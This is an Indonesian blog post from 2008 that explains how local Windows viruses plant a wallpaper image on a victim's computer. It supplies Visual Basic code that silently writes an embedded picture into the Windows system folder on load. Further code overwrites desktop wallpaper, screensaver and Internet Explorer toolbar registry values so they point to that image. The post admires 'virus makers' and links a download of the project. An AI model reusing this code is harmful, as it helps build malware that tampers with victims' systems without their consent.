Selasa, 01 Juli 2008

Virus Wallpaper

Banyak virus lokal yang membuat kita bertanya. kok virus bisa ngeset wallpaper komputer kita ya? lalu dari mana virus dapet gambar dirinya? misal virus wayang yang menset wallpaper,dan Toolbar dari Windows Explorer korbannya dengan gambar wayang lalu bagaimana gambar tersebut dapat ada di komputer kita? tentusaja virus makernya menyertakan gambar tersebut dalam tubuh virus, lalu mencoba mengeluarkan gambar tersebut ke komputer korban (semacam beranak gambar) menuliskan source yang mengubah registry untuk menset wallpaper dan Toolbar dari Windows Explorer. lalu bagaimana virus tersebut bisa mencopykan gambar ke komputer korban? ini adalah script yang aku otak-atik sendiri...

mula2 aku cari project paint(visualbasic) setelah dianalisis ternyata ada save-nya (wew...satu pintu terbuka) lalu aku berpikir bagaimana project ini bisa mensave sendiri pada saat project ini dijalankan? berarti perintah save harus di ubah ke bagian form_load

coba lagi.. perintah save sudah langsung berjalan..tapi kok aku masih harus menuliskan namaGambar dan menekan tombol save? baru gambar tersimpan.. gimana caranya bisa langsung tanpa menulis namaGambar?

otak-atik sourcenya


'Set The File Name To "" (Blank)--->kosong tanpa nama

.FileName = "C:\WINDOWS\system\OEMLOGO.bmp"--->kita kasi nama,sekaligus pengalamatannya ke C:\WINDOWS\system

lalu save

SavePicture frmDocument.PicBox.Image, .FileName

Private Sub Form_Load()
Save_Gambar '---------->jump to Private Sub Save_Gambar()

lalu bagaimana virus mengubah registry untuk menset wallpaper,Toolbar dari Windows Explorer?

virus maker mengubah bagian

HKCU\Control Panel\Desktop-Wallpaper value data:C:\WINDOWS\system\OEMLOGO.bmp-->alamat peranakan gambarVirus HKCU\Control Panel\Desktop\OriginalWallpaper
HKCU\Control Panel\Desktop\ConvertedWallpaper--->yang pling jelas dlm mense walpaper

HKU\DEFAULT\Control Panel\Desktop\SCRNSAVE.EXE

HKU\DEFAULT\Control Panel\Desktop\Wallpaper

HKCU\Software\Microsoft\Internet Explorer\Toolbar--->toolbar

tentunya juga dibagian form_load/fungsi timer

------------------

' SET BACKGROUND

cek = AmbilString(HKCU, "Control Panel\Desktop", "Wallpaper")
If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "Wallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKCU, "Control Panel\Desktop", "OriginalWallpaper")

If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "OriginalWallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKCU, "Control Panel\Desktop", "ConvertedWallpaper")

If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "ConvertedWallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKU, ".DEFAULT\Control Panel\Desktop", "SCRNSAVE.EXE")

If cek = "" Then

BuatString HKU, ".DEFAULT\Control Panel\Desktop", "SCRNSAVE.EXE", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKU, ".DEFAULT\Control Panel\Desktop", "Wallpaper")


If cek = "" Then

BuatString HKU, ".DEFAULT\Control Panel\Desktop", "Wallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"


End If

'==========

'set Toolbar dari Windows Explorer

cek = AmbilString(HKCU, "Software\Microsoft\Internet Explorer", "Toolbar")

If cek = "" Then

BuatString HKCU, "Software\Microsoft\Internet Explorer", "Toolbar", "C:\WINDOWS\system\OEMLOGO.bmp"

End If


sekarang uda ga bertanya2 lagikan kok virus bisa bikin ulah gitu? hanya virus maker yang selalu berpikir diluar batas2nya dan selalu berimajenasi dengan karyanya

untuk download nya disini...

download

download vidio



moga yang dikit ini bisa bermanfaat untuk menambah ilmu..

Tidak ada komentar: